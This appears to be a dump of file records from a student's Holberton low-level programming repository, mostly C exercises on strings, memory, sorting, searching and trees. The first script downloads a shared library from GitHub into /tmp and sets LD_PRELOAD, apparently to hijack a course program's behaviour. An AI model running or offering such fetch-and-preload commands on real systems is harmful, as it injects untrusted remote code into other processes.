"UTF-8", "text": "#!/bin/bash\nwget -P /tmp/ https://raw.github.com/david-develop/holbertonschool-low_level_programming/master/0x18-dynamic_libraries/libran.so\nexport LD_PRELOAD=/tmp/libran.so\n" }, { "alpha_fraction": 0.5220779180526733, "alphanum_fraction": 0.5376623272895813, "avg_line_length": 18.25, "blob_id": "38ab87cdad4bab539b69da4c0397b7525953bc7f", "content_id": "c803b176fc0eab56a7e8b0c5fe4da9f859d3f104", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 770, "license_type": "no_license", "max_line_length": 77, "num_lines": 40, "path": "/0x0B-malloc_free/5-argstostr.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n#include <stdio.h>\n/**\n * argstostr - concatenates all the arguments of a program.\n * @ac: arguments counter.\n * @av: arguments vectors.\n * Return: Pointer to a new string, NULL if ac = 0 or av = 0 or fails malloc.\n */\nchar *argstostr(int ac, char **av)\n{\n\tchar *new_str;\n\tint i, j, cp, final_leng;\n\n\tfinal_leng = 0;\n\tcp = 0;\n\n\tif (ac == 0 || av == NULL)\n\t\treturn (NULL);\n\n\tfor (i = 0; i < ac; i++)\n\t{\n\t\tfor (j = 0; av[i][j] != '\\0'; j++)\n\t\t\t;\n\t\tfinal_leng = final_leng + j;\n\t}\n\tnew_str = malloc(final_leng + ac + 1 * sizeof(char));\n\tif (new_str == NULL)\n\t\treturn (NULL);\n\n\tfor (i = 0; i < ac; i++)\n\t{\n\t\tfor (j = 0; av[i][j] != '\\0'; j++, cp++)\n\t\t\tnew_str[cp] = av[i][j];\n\t\tnew_str[cp] = '\\n';\n\t\tcp++;\n\t}\n\n\treturn (new_str);\n}\n" }, { "alpha_fraction": 0.4763636291027069, "alphanum_fraction": 0.4981818199157715, "avg_line_length": 12.095237731933594, "blob_id": "0e950bf07d93cee59e94cccf53d7c2de31bac259", "content_id": "52b40d29b368275e99b93f62e8e3da00ec16f8bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 275, "license_type": "no_license", "max_line_length": 37, "num_lines": 21, "path": "/0x05-pointers_arrays_strings/6-puts2.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * puts2 - print one char out of two.\n * @str: input string.\n *\n */\nvoid puts2(char *str)\n{\n\tint i = 0;\n\n\t/*count the lenght of the string*/\n\twhile (*(str + i) != '\\0')\n\t{\n\t\tif (i % 2 == 0)\n\t\t{\n\t\t\t_putchar(str[i]);\n\t\t}\n\t\ti++;\n\t}\n\t_putchar('\\n');\n}\n" }, { "alpha_fraction": 0.43421053886413574, "alphanum_fraction": 0.45394736528396606, "avg_line_length": 12.028571128845215, "blob_id": "a1e5b261b2af0359746999341498fa17e5fb22d7", "content_id": "3041079b71b3d9e5512d2d19027627f65c019d38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 456, "license_type": "no_license", "max_line_length": 41, "num_lines": 35, "path": "/0x05-pointers_arrays_strings/7-puts_half.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * puts_half - print only half of string.\n * @str: input string.\n *\n */\nvoid puts_half(char *str)\n{\n\tint leng = 0, h;\n\n\t/*count the lenght of the string*/\n\twhile (*(str + leng) != '\\0')\n\t{\n\t\tleng++;\n\t}\n\tif (leng % 2 == 0)\n\t{\n\t\th = leng / 2;\n\t\twhile (*(str + h) != '\\0')\n\t\t{\n\t\t\t_putchar(str[h]);\n\t\t\th++;\n\t\t}\n\t}\n\telse\n\t{\n\t\th = (leng + 1) / 2;\n\t\twhile (*(str + h) != '\\0')\n\t\t{\n\t\t\t_putchar(str[h]);\n\t\t\th++;\n\t\t}\n\t}\n\t_putchar('\\n');\n}\n" }, { "alpha_fraction": 0.5667396187782288, "alphanum_fraction": 0.5864332318305969, "avg_line_length": 17.280000686645508, "blob_id": "2f1269e027eb52d9d115838744dd0d011c84ea63", "content_id": "ccc76b758bc1e5a01f2d01354ddf42276a7e0543", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 457, "license_type": "no_license", "max_line_length": 67, "num_lines": 25, "path": "/0x06-pointers_arrays_strings/8-rot13.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * rot13 - encode the string to leet.\n * @s: given string.\n * Return: the string encoded.\n */\nchar *rot13(char *s)\n{\n\tint iter, i;\n\tchar a[] = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\";\n\tchar n[] = \"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm\";\n\n\tfor (iter = 0; s[iter] != '\\0'; iter++)\n\t{\n\t\tfor (i = 0; i < 52; i++)\n\t\t{\n\t\t\tif (s[iter] == a[i])\n\t\t\t{\n\t\t\t\ts[iter] = n[i];\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\treturn (s);\n}\n" }, { "alpha_fraction": 0.3802816867828369, "alphanum_fraction": 0.4154929518699646, "avg_line_length": 18.363636016845703, "blob_id": "2019731b27abc4f5249850b507ad723071755ee3", "content_id": "707a8ff19f02f3c05e2360a5793de1eaa927a53c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 426, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/0x06-pointers_arrays_strings/7-leet.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * leet - encode the string to leet.\n * @s: given string.\n * Return: the string encoded.\n */\nchar *leet(char *s)\n{\n\tint iter, i;\n\tchar a[] = {'a', 'A', 'e', 'E', 'o', 'O', 't', 'T', 'l', 'L'};\n\tchar n[] = {'4', '4', '3', '3', '0', '0', '7', '7', '1', '1'};\n\n\tfor (iter = 0; s[iter] != '\\0'; iter++)\n\t{\n\t\tfor (i = 0; i < 10; i++)\n\t\t{\n\t\t\tif (s[iter] == a[i])\n\t\t\t\ts[iter] = n[i];\n\t\t}\n\t}\n\treturn (s);\n}\n" }, { "alpha_fraction": 0.6469622254371643, "alphanum_fraction": 0.6535303592681885, "avg_line_length": 23.360000610351562, "blob_id": "cf1ffaec5e6644fb8d89960da4419ca4f0f33eda", "content_id": "46054bdd9361a5c875ddf5df75aea3c91ac3c4b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1218, "license_type": "no_license", "max_line_length": 74, "num_lines": 50, "path": "/0x1E-search_algorithms/1-binary.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"search_algos.h\"\n/**\n * print_arr - function that print array\n * @array: a pointer to the first element of the complete array\n * @left: firts index of subarray\n * @right: last index of subarray\n */\nvoid print_arr(int *array, size_t left, size_t right)\n{\n\tprintf(\"Searching in array: \");\n\tfor (; left < right; left++)\n\t{\n\t\tprintf(\"%d, \", array[left]);\n\t}\n\tprintf(\"%d\\n\", array[left]);\n}\n\n/**\n * binary_search - function that searches for a value in a sorted array of\n * integers using the Binary search algorithm\n * @array: a pointer to the first element of the array to search in\n * @size: the number of elements in array\n * @value: is the value to search for\n * Return: return the first index where value is located, If value is not\n * present in array or if array is NULL, your function must return -1\n */\n\nint binary_search(int *array, size_t size, int value)\n{\n\tsize_t left, right, middle;\n\n\tleft = 0;\n\tright = size - 1;\n\n\tif (array == NULL)\n\t\treturn (-1);\n\n\twhile (left < size)\n\t{\n\t\tprint_arr(array, left, right);\n\t\tmiddle = (left + right) / 2;\n\t\tif (array[middle] < value)\n\t\t\tleft = middle + 1;\n\t\telse if (array[middle] > value)\n\t\t\tright = middle - 1;\n\t\telse\n\t\t\treturn ((int)middle);\n\t}\n\treturn (-1);\n}\n" }, { "alpha_fraction": 0.5745682716369629, "alphanum_fraction": 0.587127149105072, "avg_line_length": 21.75, "blob_id": "8a9190a05c355256f380eaa66a30e0176c33e358", "content_id": "84047a592a731aa28ce904d734eadd3e071b071d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 637, "license_type": "no_license", "max_line_length": 64, "num_lines": 28, "path": "/0x06-pointers_arrays_strings/1-strncat.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * _strncat - concatenate two strings\n * @dest: the string where we want to append.\n * @src: the string from which n characters are going to append.\n * @n: maximum number of character to be appended.\n * Return: pointer to the dest string.\n */\nchar *_strncat(char *dest, char *src, int n)\n{\n\tint i = 0, iter_n = 0;\n\n\t/*count first string*/\n\twhile (dest[i] != '\\0')\n\t{\n\t\ti++;\n\t}\n\t/*add second string to the first until n and only to the '\\0'*/\n\tfor (iter_n = 0; iter_n < n && src[iter_n] != '\\0'; iter_n++)\n\t{\n\t\tdest[i] = src[iter_n];\n\t\ti++;\n\t}\n\t/* add '\\0' at the end */\n\tdest[i] = '\\0';\n\treturn (&(*dest));\n}\n" }, { "alpha_fraction": 0.5483993887901306, "alphanum_fraction": 0.5590701103210449, "avg_line_length": 17.609928131103516, "blob_id": "5bd8d76893eb91c89ce71181596f50c418785d4b", "content_id": "273f748fa82513dd566bd3628824c0e3420c451b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2624, "license_type": "no_license", "max_line_length": 73, "num_lines": 141, "path": "/0x1B-sorting_algorithms/106-bitonic_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * printarr - print the array sent\n * @array: array\n * @begin: begin of the array\n * @end: end of the array\n */\nvoid printarr(int *array, int begin, int end)\n{\n\tint i;\n\tchar *sep;\n\n\tsep = \"\";\n\tfor (i = begin; i < end; i++)\n\t{\n\t\tprintf(\"%s%d\", sep, array[i]);\n\t\tsep = \", \";\n\t}\n\tprintf(\"\\n\");\n}\n/**\n * sortup - sorts in increasing way\n * @array: array to sort\n * @begin: begin position of the array\n * @size: last position + 1 of the array\n */\nvoid sortup(int *array, int begin, int size)\n{\n\tint j, cont = begin, pos;\n\tint aux, flag = 0, value;\n\n\twhile (cont < size)\n\t{\n\t\tpos = cont;\n\t\tvalue = array[cont];\n\t\tfor (j = cont; j < size; j++)\n\t\t{\n\t\t\tif (value > array[j])\n\t\t\t{\n\t\t\t\tflag = 1;\n\t\t\t\tvalue = array[j];\n\t\t\t\tpos = j;\n\t\t\t}\n\t\t}\n\t\tif (flag == 1)\n\t\t{\n\t\t\taux = array[cont];\n\t\t\tarray[cont] = value;\n\t\t\tarray[pos] = aux;\n\t\t}\n\t\tcont++;\n\t\tflag = 0;\n\t}\n\tprintarr(array, begin, size);\n}\n/**\n * sortdown - sorts in a decreasing way\n * @array: array to sort\n * @begin: initial position\n * @size: last position + 1 of the array\n */\nvoid sortdown(int *array, int begin, int size)\n{\n\tint j, cont = begin, pos;\n\tint aux, flag = 0, value;\n\n\twhile (cont < size)\n\t{\n\t\tpos = cont;\n\t\tvalue = array[cont];\n\t\tfor (j = cont; j < size; j++)\n\t\t{\n\t\t\tif (value < array[j])\n\t\t\t{\n\t\t\t\tflag = 1;\n\t\t\t\tvalue = array[j];\n\t\t\t\tpos = j;\n\t\t\t}\n\t\t}\n\t\tif (flag == 1)\n\t\t{\n\t\t\taux = array[cont];\n\t\t\tarray[cont] = value;\n\t\t\tarray[pos] = aux;\n\t\t}\n\t\tcont++;\n\t\tflag = 0;\n\t}\n\tprintarr(array, begin, size);\n\n}\n/**\n * sorting - partion of the arrays\n * @array: array\n * @begin: initial position\n * @end: last position + 1 of the array\n * @bool: 0 or 1 to know if its Up or Down\n * @size: size of the original array\n */\nvoid sorting(int *array, int begin, int end, int bool, int size)\n{\n\tchar *dir;\n\n\tif (end - begin < 2)\n\t\treturn;\n\n\tif (bool == 0)\n\t\tdir = \"UP\";\n\telse\n\t\tdir = \"DOWN\";\n\tprintf(\"Merging [%d/%d] (%s):\\n\", (end - begin), size, dir);\n\tprintarr(array, begin, end);\n\n\tif (end - begin == 2)\n\t\treturn;\n\n\tsorting(array, begin, (begin + end) / 2, 0, size);\n\tprintf(\"Result [%d/%d] (UP):\\n\", (((end + begin) / 2) - begin), size);\n\tsortup(array, begin, (begin + end) / 2);\n\n\tsorting(array, (begin + end) / 2, end, 1, size);\n\tprintf(\"Result [%d/%d] (DOWN):\\n\", (((end + begin) / 2) - begin), size);\n\tsortdown(array, (begin + end) / 2, end);\n\n}\n/**\n *bitonic_sort - sort using bitonic way\n *@array: array to sort\n *@size: size of array\n */\nvoid bitonic_sort(int *array, size_t size)\n{\n\tif (!array || size <= 1)\n\t{\n\t\treturn;\n\t}\n\tsorting(array, 0, size, 0, (int)size);\n\tprintf(\"Result [%ld/%ld] (UP):\\n\", size, size);\n\tsortup(array, 0, (int)size);\n\n}\n" }, { "alpha_fraction": 0.30779942870140076, "alphanum_fraction": 0.32729804515838623, "avg_line_length": 31.636363983154297, "blob_id": "c1e075b8aa524458a100e56562907174320b439e", "content_id": "0adaac88c786236bb29cfcc01295d53e95ba1d94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1436, "license_type": "no_license", "max_line_length": 72, "num_lines": 44, "path": "/0x1C-makefiles/5-island_perimeter.py", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\"\"\"module to find island perimeter\"\"\"\n\n\ndef island_perimeter(grid):\n \"\"\"that returns the perimeter of the island described in grid\"\"\"\n count = 0\n for column in range(len(grid)):\n for row in range(len(grid[column])):\n if grid[column][row] == 1:\n # verify up\n if column - 1 < 0:\n count += 1\n else:\n try:\n if grid[column - 1][row] == 0 or column - 1 < 0:\n count += 1\n except:\n pass\n # verify down\n if column + 1 > len(grid) - 1:\n count += 1\n else:\n try:\n if grid[column + 1][row] == 0:\n count += 1\n except:\n pass\n # verify right\n if row + 1 > len(grid[column]) - 1:\n count += 1\n else:\n try:\n if grid[column][row + 1] == 0:\n count += 1\n except:\n pass\n # verify left\n try:\n if grid[column][row - 1] == 0 or row - 1 < 0:\n count += 1\n except:\n pass\n return count\n" }, { "alpha_fraction": 0.6407484412193298, "alphanum_fraction": 0.6469854712486267, "avg_line_length": 23.540817260742188, "blob_id": "fed88a143620fcb0e1f40846175b45d55170d2b3", "content_id": "f596c8f74fde0e5eb4b9835ba85ed3b1d35752d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2405, "license_type": "no_license", "max_line_length": 79, "num_lines": 98, "path": "/0x1E-search_algorithms/103-exponential.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"search_algos.h\"\n\n/**\n * _min - function that find the minimun between two numbers\n * @a: number\n * @b: number\n * Return: minimun value\n */\nsize_t _min(size_t a, size_t b)\n{\n\tsize_t min;\n\n\tif (a < b)\n\t\tmin = a;\n\telse\n\t\tmin = b;\n\treturn (min);\n}\n/**\n * print_arr_bin - function that print array\n * @array: a pointer to the first element of the complete array\n * @left: firts index of subarray\n * @right: last index of subarray\n */\nvoid print_arr_bin(int *array, size_t left, size_t right)\n{\n\tprintf(\"Searching in array: \");\n\tfor (; left < right; left++)\n\t{\n\t\tprintf(\"%d, \", array[left]);\n\t}\n\tprintf(\"%d\\n\", array[left]);\n}\n\n/**\n * binary_search_exp - function that searches for a value in a sorted array of\n * integers using the Binary search algorithm\n * @array: a pointer to the first element of the array to search in\n * @size: the number of elements in array\n * @value: is the value to search for\n * @left: first position to search in array\n * Return: return the first index where value is located, If value is not\n * present in array or if array is NULL, your function must return -1\n */\n\nint binary_search_exp(int *array, size_t left, size_t size, int value)\n{\n\tsize_t right, middle;\n\n\tright = size - 1;\n\n\tif (array == NULL)\n\t\treturn (-1);\n\n\twhile (left < size)\n\t{\n\t\tprint_arr_bin(array, left, right);\n\t\tmiddle = (left + right) / 2;\n\t\tif (array[middle] < value)\n\t\t{\n\t\t\tleft = middle + 1;\n\t\t}\n\t\telse if (array[middle] > value)\n\t\t{\n\t\t\tright = middle - 1;\n\t\t}\n\t\telse\n\t\t\treturn ((int) middle);\n\t}\n\treturn (-1);\n}\n\n/**\n * exponential_search - function that searches for a value in a sorted array of\n * integers using the Exponential search algorithm\n * @array: a pointer to the first element of the array to search in\n * @size: the number of elements in array\n * @value: is the value to search for\n * Return: return the first index where value is located, If value is not\n * present in array or if array is NULL, your function must return -1\n */\nint exponential_search(int *array, size_t size, int value)\n{\n\tsize_t bound = 1;\n\n\tif (array == NULL)\n\t\treturn (-1);\n\n\twhile (bound < size && array[bound] < value)\n\t{\n\t\tprintf(\"Value checked array[%d] = [%d]\\n\", (int) bound, array[bound]);\n\t\tbound *= 2;\n\t}\n\n\tprintf(\"Value found between indexes [%d] and [%d]\\n\", (int) (bound / 2),\n\t (int) _min(bound, size - 1));\n\treturn (binary_search_exp(array, (bound / 2), _min(bound + 1, size), value));\n}\n" }, { "alpha_fraction": 0.3341902196407318, "alphanum_fraction": 0.37660667300224304, "avg_line_length": 15.553191184997559, "blob_id": "41ede67babd6100a790af0cf3494ec695be7cab7", "content_id": "8cf375292939166beaf6b822e4afb608296f08b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 778, "license_type": "no_license", "max_line_length": 64, "num_lines": 47, "path": "/0x02-functions_nested_loops/100-times_table.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_times_table - prints the n times table, starting with 0\n * @n: input variable.\n */\n\nvoid print_times_table(int n)\n{\n\tint r, m, d, fd, td;\n\n\tif (n <= 15)\n\t{\n\t\tfor (m = 0; m <= n; m++)\n\t\t{\n\t\t\tfor (d = 0; d <= n; d++)\n\t\t\t{ r = m * d;\n\t\t\t\tfd = (r / 10) % 10;\n\t\t\t\tif (r < 10)\n\t\t\t\t{\n\t\t\t\t\tif (!(d == 0))\n\t\t\t\t\t{ _putchar(' ');\n\t\t\t\t\t\t_putchar(' ');\n\t\t\t\t\t}\n\t\t\t\t\t_putchar('0' + r);\n\t\t\t\t}\n\t\t\t\telse if (r >= 10 && r < 100)\n\t\t\t\t{ r = r % 10;\n\t\t\t\t\t_putchar(' ');\n\t\t\t\t\t_putchar('0' + fd);\n\t\t\t\t\t_putchar('0' + r);\n\t\t\t\t}\n\t\t\t\telse if (r >= 100)\n\t\t\t\t{ td = r / 100;\n\t\t\t\t\tr = r % 10;\n\t\t\t\t\t_putchar('0' + td);\n\t\t\t\t\t_putchar('0' + fd);\n\t\t\t\t\t_putchar('0' + r);\n\t\t\t\t}\n\t\t\t\tif (!(d == n))\n\t\t\t\t{ _putchar(',');\n\t\t\t\t\t_putchar(' ');\n\t\t\t\t}\n\t\t\t}\n\t\t\t_putchar('\\n');\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.5374449491500854, "alphanum_fraction": 0.566079318523407, "avg_line_length": 19.177778244018555, "blob_id": "d9e6a00204b3fd3c550d45acab0d4a1ba486d459", "content_id": "4b904897bc39c0080a1ecf96a4e2d725363e3688", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 908, "license_type": "no_license", "max_line_length": 70, "num_lines": 45, "path": "/0x0C-more_malloc_free/101-mul.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n#include <stdlib.h>\n#include <ctype.h>\n#include <string.h>\n/**\n * main - program thar print the multiplication result of two numbers.\n * @argc: argument count.\n * @argv: argument vector.\n * Return: 1 if program doesn't recive two arguments, otherwise 0.\n */\nint main(int argc, char *argv[])\n{\n\tint mul, i, array_i, len1, len2;\n\tchar *result = NULL;\n\n\tif (argc < 3 || argc > 3)\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(98);\n\t}\n\telse if (argc > 1)\n\t{\n\t\tlen1 = strlen(argv[1]);\n\t\tlen2 = strlen(argv[2]);\n\t\tresult = malloc(sizeof(char) * (len1 + len2 + 1));\n\t\tif (result == NULL)\n\t\t\texit(98);\n\t\tfor (i = 1; i < argc; i++)\n\t\t{\n\t\t\tfor (array_i = 0; argv[i][array_i] != '\\0'; array_i++)\n\t\t\t{\n\t\t\t\tif (!isdigit(argv[i][array_i]))\n\t\t\t\t{\n\t\t\t\t\tprintf(\"Error\\n\");\n\t\t\t\t\texit(98);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tmul = atoi(argv[1]) * atoi(argv[2]);\n\t\tprintf(\"%d\\n\", mul);\n\t}\n\tfree(result);\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.5967302322387695, "alphanum_fraction": 0.6046321392059326, "avg_line_length": 19.502792358398438, "blob_id": "47e17f7fb1cff9d8f5bd8b14f4c13e33ec05a094", "content_id": "51fb1fa824d0121529d15d47c90bcb423ee3ef89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3670, "license_type": "no_license", "max_line_length": 77, "num_lines": 179, "path": "/0x1D-binary_trees/131-heap_insert_copy.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"binary_trees.h\"\n\n/**\n * swap_right - function that swap if parent is bigger, right case\n * @node: node to be checked and swaped\n * @parent: node->parent\n */\nvoid swap_right(heap_t *node, heap_t *parent)\n{\n\theap_t *aux, *aux2;\n\n\taux = parent->left;\n\taux2 = parent->parent;\n\n\tparent->right = node->right;\n\tif (node->right)\n\t\tnode->right->parent = parent;\n\tparent->left = node->left;\n\tif (node->left)\n\t\tnode->left->parent = parent;\n\n\tnode->right = parent;\n\tnode->left = aux;\n\tif (aux)\n\t\taux->parent = node;\n\tparent->parent = node;\n\tnode->parent = aux2;\n\tif (aux2 && parent == aux2->left)\n\t\taux2->left = node;\n\telse if (aux2 && parent == aux2->right)\n\t\taux2->right = node;\n}\n\n/**\n * swap_left - function that swap if parent is bigger, left case\n * @node: node to be checked and swaped\n * @parent: node->parent\n */\nvoid swap_left(heap_t *node, heap_t *parent)\n{\n\theap_t *aux, *aux2;\n\n\taux = parent->right;\n\taux2 = parent->parent;\n\n\tparent->right = node->right;\n\tif (node->right)\n\t\tnode->right->parent = parent;\n\tparent->left = node->left;\n\tif (node->left)\n\t\tnode->left->parent = parent;\n\n\tnode->left = parent;\n\tnode->right = aux;\n\tif (aux)\n\t\taux->parent = node;\n\tparent->parent = node;\n\tnode->parent = aux2;\n\tif (aux2 && parent == aux2->left)\n\t\taux2->left = node;\n\telse if (aux2 && parent == aux2->right)\n\t\taux2->right = node;\n}\n/**\n * height - measures the height of a tree\n *\n * @tree: tree root\n * Return: height\n */\nint height(const binary_tree_t *tree)\n{\n\tint left = 0;\n\tint right = 0;\n\n\tif (tree == NULL)\n\t\treturn (-1);\n\n\tleft = height(tree->left);\n\tright = height(tree->right);\n\n\tif (left > right)\n\t\treturn (left + 1);\n\n\treturn (right + 1);\n}\n\n/**\n * binary_tree_is_perfect - checks if a binary tree is perfect\n *\n * @tree: tree root\n * Return: 1 if tree is perfect, 0 otherwise\n */\nint binary_tree_is_perfect(const binary_tree_t *tree)\n{\n\tif (tree && height(tree->left) == height(tree->right))\n\t{\n\t\tif (height(tree->left) == -1)\n\t\t\treturn (1);\n\n\t\tif ((tree->left && !((tree->left)->left) && !((tree->left)->right))\n\t\t && (tree->right && !((tree->right)->left) && !((tree->right)->right)))\n\t\t\treturn (1);\n\n\t\tif (tree && tree->left && tree->right)\n\t\t\treturn (binary_tree_is_perfect(tree->left) &&\n\t\t\t\tbinary_tree_is_perfect(tree->right));\n\t}\n\n\treturn (0);\n}\n\n/**\n * swap - function that swap if parent is bigger\n * @arg_node: node to be checked and swaped\n */\nvoid swap(const heap_t *node)\n{\n\theap_t *parent;\n\n\tparent = node->parent;\n\n\twhile (node->parent && node->n > node->parent->n)\n\t{\n\t\tparent = node->parent;\n\t\tif (node == parent->right)\n\t\t{\n\t\t\tswap_right((heap_t *)node, parent);\n\t\t}\n\t\telse if (node == parent->left)\n\t\t{\n\t\t\tswap_left((heap_t *)node, parent);\n\t\t}\n\t}\n}\n\n/**\n * heap_insert - function that inserts a value in Max Binary Heap\n * @value: value to be inserted\n * @root: tree root\n * Return: pointer to the created node, or NULL on failure.\n */\nheap_t *heap_insert(heap_t **root, int value)\n{\n\theap_t *new_node;\n\theap_t **root_right = &((*root)->right);\n\theap_t **root_left = &((*root)->left);\n\n\tif (*root == NULL)\n\t{\n\t\t*root = binary_tree_node(NULL, value);\n\t\treturn (*root);\n\t}\n\n\tif (binary_tree_is_perfect(*root) || !binary_tree_is_perfect((*root)->left))\n\t{\n\t\tif ((*root)->left)\n\t\t\tnew_node = heap_insert(root_left, value);\n\t\telse\n\t\t{\n\t\t\tnew_node = (*root)->left = binary_tree_node(*root, value);\n\t\t\tswap(new_node);\n\t\t}\n\t}\n\telse\n\t{\n\t\tif ((*root)->right)\n\t\t\tnew_node = heap_insert(root_right, value);\n\t\telse\n\t\t{\n\t\t\tnew_node = (*root)->right = binary_tree_node(*root, value);\n\t\t\tswap(new_node);\n\t\t}\n\t}\n\n\tif (new_node->parent == NULL && (*root)->parent != NULL &&\n\t !((*root)->parent->parent))\n\t\t*root = new_node;\n\treturn (new_node);\n}\n" }, { "alpha_fraction": 0.5896487832069397, "alphanum_fraction": 0.5914972424507141, "avg_line_length": 15.90625, "blob_id": "fadb52ffd5816465d918a17312b48f49a9a9601a", "content_id": "cf4c6b052843b2beb8961920b74dfa9894aaed24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 541, "license_type": "no_license", "max_line_length": 58, "num_lines": 32, "path": "/0x1A-hash_tables/6-hash_table_delete.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"hash_tables.h\"\n\n/**\n * hash_table_delete - function that deletes a hash table.\n * @ht: hash table that will be deleted.\n */\n\nvoid hash_table_delete(hash_table_t *ht)\n{\n\thash_node_t *cursor;\n\thash_node_t *temp;\n\tunsigned long int i;\n\n\tif (ht == NULL)\n\t\treturn;\n\n\tfor (i = 0; i < ht->size; i++)\n\t{\n\t\tif (ht->array[i] == NULL)\n\t\t\tcontinue;\n\t\tfor (cursor = ht->array[i]; cursor != NULL;)\n\t\t{\n\t\t\ttemp = cursor->next;\n\t\t\tfree(cursor->key);\n\t\t\tfree(cursor->value);\n\t\t\tfree(cursor);\n\t\t\tcursor = temp;\n\t\t}\n\t}\n\tfree(ht->array);\n\tfree(ht);\n}\n" }, { "alpha_fraction": 0.6470588445663452, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 16, "blob_id": "efe803eff51b1df2dc06f3eb3e51cdb32adf49e8", "content_id": "5b01708a38d15c8bcfc5e278a67620f12c695557", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 17, "license_type": "no_license", "max_line_length": 16, "num_lines": 1, "path": "/0x1D-binary_trees/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### Binary trees\n" }, { "alpha_fraction": 0.5657015442848206, "alphanum_fraction": 0.570155918598175, "avg_line_length": 19.409090042114258, "blob_id": "dcf43a0257486f6b60200d27b1b6e9753dfc44cd", "content_id": "12803f3be9aa590a3c82d6634f654e65694396c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 449, "license_type": "no_license", "max_line_length": 76, "num_lines": 22, "path": "/0x07-pointers_arrays_strings/5-strstr.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stddef.h>\n/**\n * _strstr - locates a substring.\n * @haystack: input string.\n * @needle: substring to be matched.\n * Return: pointer to object.\n */\nchar *_strstr(char *haystack, char *needle)\n{\n\tchar *p_i;\n\tchar *p_ss = needle;\n\n\tfor (; *haystack != '\\0'; haystack++)\n\t{\n\t\tfor (p_i = haystack, p_ss = needle; *p_ss == *p_i && *p_ss; p_ss++, p_i++)\n\t\t\t;\n\t\tif (*p_ss == '\\0')\n\t\t\treturn (haystack);\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.5945945978164673, "alphanum_fraction": 0.6047297120094299, "avg_line_length": 16.41176414489746, "blob_id": "1a3164fa5528a1e8163fb6597ec8de4f29a57593", "content_id": "40d51396e334a945d657b388a842bb93433729bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 296, "license_type": "no_license", "max_line_length": 61, "num_lines": 17, "path": "/0x0B-malloc_free/4-free_grid.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * free_grid - frees a 2 dimensional grid previously created.\n * @grid: input matrix.\n * @height: height of the matrix.\n */\nvoid free_grid(int **grid, int height)\n{\n\tint k;\n\n\tfor (k = (height - 1); k >= 0; k--)\n\t{\n\t\tfree(grid[k]);\n\t}\n\tfree(grid);\n}\n" }, { "alpha_fraction": 0.6142321825027466, "alphanum_fraction": 0.6217228174209595, "avg_line_length": 20.360000610351562, "blob_id": "ed87d5f6645d4e18d46105d42afa595402c6b041", "content_id": "f81c9a0d3b6c5a50dd4ec52202b97a1ce3c9b3b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 534, "license_type": "no_license", "max_line_length": 73, "num_lines": 25, "path": 